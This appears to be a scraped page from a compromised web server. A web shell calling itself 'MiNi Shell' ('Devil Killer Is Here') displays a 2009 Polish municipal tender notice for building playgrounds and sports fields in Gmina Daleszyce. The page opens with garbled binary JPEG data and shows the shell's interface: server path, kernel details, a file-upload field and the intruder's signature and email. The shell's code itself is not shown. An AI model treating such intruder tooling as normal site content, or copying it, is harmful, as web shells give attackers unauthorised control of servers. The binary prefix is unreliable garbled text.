JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090818/282076-N-2009.html

<p class="kh_header"><b>Daleszyce: 1.	Budowa placu zabaw w Cisowie
2.	Budowa placu zabaw w Słopcu
3.	Budowa placu zabaw w msc. Marzysz
4.	Budowa boiska w Słopcu	
5.	Budowa boiska w msc. Marzysz
6.	Remont boiska w Sierakowie.</b><br>
<b>Numer ogłoszenia: 282076 - 2009; data zamieszczenia: 18.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Daleszyce , pl. Staszica 9, 26-021 Daleszyce, woj. świętokrzyskie, tel. 0-41 3171693, faks 0-41 3171693.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.daleszyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.	Budowa placu zabaw w Cisowie
2.	Budowa placu zabaw w Słopcu
3.	Budowa placu zabaw w msc. Marzysz
4.	Budowa boiska w Słopcu	
5.	Budowa boiska w msc. Marzysz
6.	Remont boiska w Sierakowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1). Budowa placu zabaw w Cisowie
Zamówienie obejmuje wykonanie następujących robót: oczyszczenie, przygotowanie terenu, wykonanie nawierzchni placu zabaw, montaż urządzeń zabawowych (huśtawki, zestawy zabawowe, karuzele) oraz urządzeń małej architektury (ławki,  kosze, drewniane, tablica informacyjna, ogrodzenie), wykonanie nawierzchni bezpiecznych pod urządzeniami, nawierzchni z kruszywa, nawierzchni z piasku nasadzeń drzew i krzewów, założenie trawnika.
Ze względu na bezpieczeństwo użytkowania i gwarancję udzielaną  na urządzenia montaż zabawek musi być wykonany przez producenta urządzeń za pomocą prefabrykatów   dostarczanych z zabawkami, z zachowaniem niezbędnych stref bezpieczeństwa, na przygotowanej nawierzchni.
2).  Budowa placu zabaw w Słopcu
Obszar objęty realizacją zadania o pow. ok. 0,56 ha. Teren ogrodzony rozgraniczony jest po granicach własności prefabrykowanym ogrodzeniem betonowym i od strony drogi ogrodzeniem z siatki z drutu stalowego na słupkach stalowych. Zadaniem jest utworzenie niewielkiego placu zabaw. Będzie on wyposażony w seryjnie produkowane urządzenia zabawowe posiadające certyfikaty i aprobaty techniczne. Ze względu na bezpieczeństwo użytkowania i gwarancję udzielaną  na urządzenia montaż zabawek musi być wykonany przez producenta urządzeń za pomocą prefabrykatów   dostarczanych z zabawkami, z zachowaniem niezbędnych stref bezpieczeństwa, na istniejącej nawierzchni trawiastej. 
3).  Budowa placu zabaw w msc. Marzysz
Zadaniem jest utworzenie niewielkiego placu zabaw. Będzie on wyposażony w seryjnie produkowane urządzenia zabawowe posiadające certyfikaty i aprobaty techniczne. Ze względu na bezpieczeństwo użytkowania i gwarancję udzielaną  na urządzenia montaż zabawek musi być wykonany przez producenta urządzeń za pomocą prefabrykatów   dostarczanych z zabawkami, z zachowaniem niezbędnych stref bezpieczeństwa, na istniejącej nawierzchni trawiastej. 
4) Budowa boiska w Słopcu	
1/ Boisko do piłki nożnej.  Projekt przewiduje modernizację istniejącego boiska i utworzenie boiska o wym. 42 x 20 m. plus pas szerokości 2 m wokół płyty boiska. Obecnie powierzchnia boiska jest nierówna i posiada zagłębienia. Nawierzchnię płyty boiska należy wyrównać przez nawiezienie urodzajnej lekkiej ziemi, zdolnej do stworzenia warstwy wegetacyjnej, przewidywana miąższość ok. 15 cm. Zasiew trawy z gotowej odpowiedniej mieszanki traw - trawę wysiać w terminie do 10 października 2009 r.
2/ Boisko do koszykówki. 
Zadaniem jest wykonanie boiska o wym. 15 x 13,6 m o nawierzchni z wykonanej prostokątnej kostki betonowej gr. 6 cm koloru szarego i czerwonego na posypce piaskowej gr. 5 cm na 15 cm podbudowie z tłucznia. Płyta boiska obramowana Obrzeżem gr. 6 cm. Ustawienie jednego stojaka do kosza, wysokość obręczy 2,6 m. Zaleca się wykonanie montażu przez producenta urządzenia. Utworzenie małej architektury zgodnie z projektem placu zabaw i boiska w Słopcu.
5)	Budowa boiska w msc. Marzysz
1/ Boisko do piłki nożnej
Zniwelowanie płyty boiska wymaga wykonania robót ziemnych, odpojenia i przemieszczenia mas ziemnych i zagęszczenia nasypów o przewidywanej objętości 224 m3.  Po wykonaniu robót ziemnych płyta boiska będzie pokryta humusem z ziemi urodzajnej o gr. 6 cm . Siew mieszanki traw w terminie do 10 października 2009 r.
2/ Boiska do koszykówki
Zadaniem jest wykonanie boiska o wym. 15 x 13,6 m o nawierzchni z wykonanej prostokątnej kostki betonowej gr. 6 cm koloru szarego i czerwonego na posypce piaskowej gr. 5 cm na 15 cm podbudowie z tłucznia. Płyta boiska obramowana Obrzeżem gr. 6 cm. Ustawienie jednego stojaka do kosza, wysokość obręczy 2,6 m. Zaleca się wykonanie montażu przez producenta urządzenia. Utworzenie małej architektury zgodnie z projektem placu zabaw i boiska w Marzyszu.
6) Remont boiska w Sierakowie.
Zadaniem jest wykonanie remontu boiska w msc. Sieraków 
Do zakresu robót należy:
-odwodnienie płyty boiska,
- wykonanie płyty boiska,
- wykonanie odwodnienia liniowego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.11.27.20-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Warunkiem przystąpienia do przetargu jest wniesienie wadium w wysokości 
30 000,00 PLN (słownie złotych: trzydzieści tysięcy złotych 00/100 PLN).                Wadium winno być wniesione w formie określonej w art. 45 ust. 6 ustawy Prawo zamówień publicznych, tj. w:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym.
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Dowód wniesienia wadium należy dołączyć do oferty.
W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na konto: nr  04 8485 0009 0000 0130 9000 0002 z takim wyprzedzeniem, aby w dniu otwarcia ofert tj.  08.09.2009r. o godz. 11 00 środki znalazły się na koncie Zamawiającego.
Zwrot, zatrzymanie lub ponowne wniesienie wadium następuje na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
Gwarancja bankowa lub ubezpieczeniowa musi zawierać w swojej treści zapis o realizacji gwarancji na rzecz Zamawiającego zgodnie z podstawami utraty wadium zawartymi, w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych,<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki udziału w
postępowaniu określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, tzn.:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ustawy Prawo zamówień publicznych.
Za spełnienie warunku określonego w pkt 8.1 lit. a siwz. 
Zamawiający uzna prowadzenie przez Wykonawcę działalności gospodarczej w zakresie objętym przedmiotem zamówienia, zarejestrowanej w Krajowym Rejestrze Sądowym lub innym organie ewidencji działalności gospodarczej.
Za spełnienie warunku określonego w pkt 8.1 lit. b) Zamawiający uzna:
- wykonanie przez Wykonawcę z należytą starannością co najmniej dwóch zamówień o wielkości i charakterze zbliżonym do będącego przedmiotem przetargu, polegającego na wykonaniu obiektów o podobnym charakterze w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności firmy jest krótszy w tym okresie. 
Wartość zrealizowanego przynajmniej jednego zamówienia winna wynosić co najmniej
80 000,00 zł brutto.
- dysponowanie osobami które będą sprawowały nadzór nad robotami posiadającymi
uprawnienia, do kierowania robotami budowlanymi, należącymi do właściwej izby samorządu zawodowego.
Za spełnienie warunku określonego w pkt 8.1 lit. c siwz Zamawiający uzna:
- posiadanie przez Wykonawcę środków finansowych lub wykazanie się zdolnością kredytową na kwotę co najmniej  150 000,00 zł.
- posiadanie przez Wykonawcę ważnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż  
100 000,00 zł.
Ocena spełniania warunków udziału w postępowania dokonana zostanie wg. kryterium
spełnia/nie spełnia odbędzie się na podstawie złożonych dokumentów i oświadczeń
wymienionych w punkcie 9 SIWZ.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się aby przynajmniej jeden z Wykonawców (lub wspólnie) spełniał wymagania o których mowa wpkt. 8.1. a),b),c) siwz. W przypadku konsorcjum żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie art.24 ust. 1 i 2 ustawy.
Zamawiający zastrzega sobie, że w przypadku, kiedy umowa o wykonanie zamówienia
publicznego będzie zawierana z kilkoma Wykonawcami występującymi wspólnie do umowy tej zostaną wprowadzone postanowienia ustalające solidarną odpowiedzialność tych Wykonawców za wykonanie zobowiązań wynikających z umowy w pełnym zakresie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta poza formularzem ofertowym musi zawierać następujące oświadczenia i dokumenty:
a) oświadczenie, o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - (wg wzoru podanego w załączniku nr 2),
b) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
c) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie  w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
d) wykaz zrealizowanych robót budowlanych odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, (zawierający wykonanie co najmniej 2 robót budowlanych polegających na budowie obiektów o  podobnym charakterze jak w zamówieniu  przy czym wartość przynajmniej jednego zamówienia winna wynosić minimum 80 000,00 zł brutto ) wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie (wg wzoru podanego w załączniku nr 3);
g) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia oraz zakresu wykonywanych przez nich czynności (wg wzoru podanego w załączniku nr 4),
h) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 9.1.g) SIWZ wykonawca wskazał osoby którymi będzie dysponował,
i) dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, (kserokopie uprawnień kierownika budowy do kierowania robotami budowlanymi w specjalnościach: konstrukcyjno-budowlanej, wraz  z aktualnymi zaświadczeniami o przynależności do oddziału właściwej izby samorządu zawodowego) ;
j) wykaz części zamówienia, których realizację wykonawca zamierza powierzyć podwykonawcom (wg wzoru podanego w załączniku nr 5);
k) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których
wykonawca posiada rachunek , potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości nie mniejszej niż 150 000,00 zł, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
l) polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
gospodarczej na kwotę nie niższą niż 100 000,00 zł.;
m) dowód wniesienia wadium.
n) oświadczenie, że Wykonawcy znane są przepisy w zakresie realizacji inwestycji realizowanych z udziałem środków finansowych unijnych - złożone na formularzu ofertowym.
W przypadku konsorcjum do oferty musi być załączony dokument ustanawiający
pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Dokument należy złożyć w formie oryginału lub kopii poświadczonej przez notariusza.
Pełnomocnictwo winno w szczególności zawierać:
-nazwę postępowania o zamówienie publiczne, którego dotyczy,
-wskazywać wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych co najmniej z nazwy,
-zawierać informacje dotyczące ustanowionego Pełnomocnika oraz zakresu jego umocowania,
- dokument pełnomocnictwa musi być podpisany przez Wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli.
Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
Oświadczenia i informacje składane przez lub wobec pełnomocnika są skuteczne wobec wszystkich Wykonawców ubiegających się wspólnie o uzyskanie zamówienia.
W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumenty wymienione w pkt. 9.1. a) ,b),c), d), e) składa każdy z Wykonawców oddzielnie. Pozostałe dokumenty mogą być przedstawione przez jednego Wykonawcę lub wspólnie.
Dokumenty o których mowa w pkt. 9.1. a) - m) siwz należy przedstawić w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę/osoby uprawnioną/e do reprezentacji Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.daleszyce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Daleszycach,  26-021 Daleszyce, Pl. Staszica 9 pok.4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.09.2009 godzina 11:00, miejsce: Urząd Miasta i Gminy w Daleszycach,  26-021 Daleszyce, Pl. Staszica 9 pok.25 -sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com